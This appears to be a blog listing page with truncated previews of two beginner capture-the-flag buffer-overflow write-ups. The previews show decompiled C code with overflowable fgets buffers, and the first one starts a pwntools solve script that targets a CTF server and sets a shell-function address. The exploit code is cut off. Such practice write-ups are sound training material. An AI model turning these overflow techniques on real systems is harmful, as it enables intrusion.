Phantom

Basic BOF #2SourceSolveBasic BOF #2Sourcent __cdecl main(int argc, const char **argv, const char **envp) { char s[80]; // [esp+Ch] [ebp-8Ch] void (*v5)(void); // [esp+8Ch] [ebp-Ch] v5 = (void (*)(void))sup; fgets(s, 133, stdin); v5(); return 0; }Solvefrom pwn import * e = ELF("./bof_basic2") #p = process("./bof_basic2") r = remote("ctf.j0n9hyun.xyz", 3001) shell = 0x804849b payload = '' payload ..

Basic BOF #1SourceSolveBasic BOF #1Sourceint __cdecl main(int argc, const char **argv, const char **envp) { char s[40]; // [esp+4h] [ebp-34h] int v5; // [esp+2Ch] [ebp-Ch] v5 = 0x4030201; fgets(&s, 45, stdin); printf("\n[buf]: %s\n", &s); printf("[check] %p\n", v5); if ( v5 != 0x4030201 && v5 != 0xDEADBEEF ) puts("\nYou are on the right way!"); if ( v5 == 0xDEADBEEF ) { puts("Yeah dude! You win!..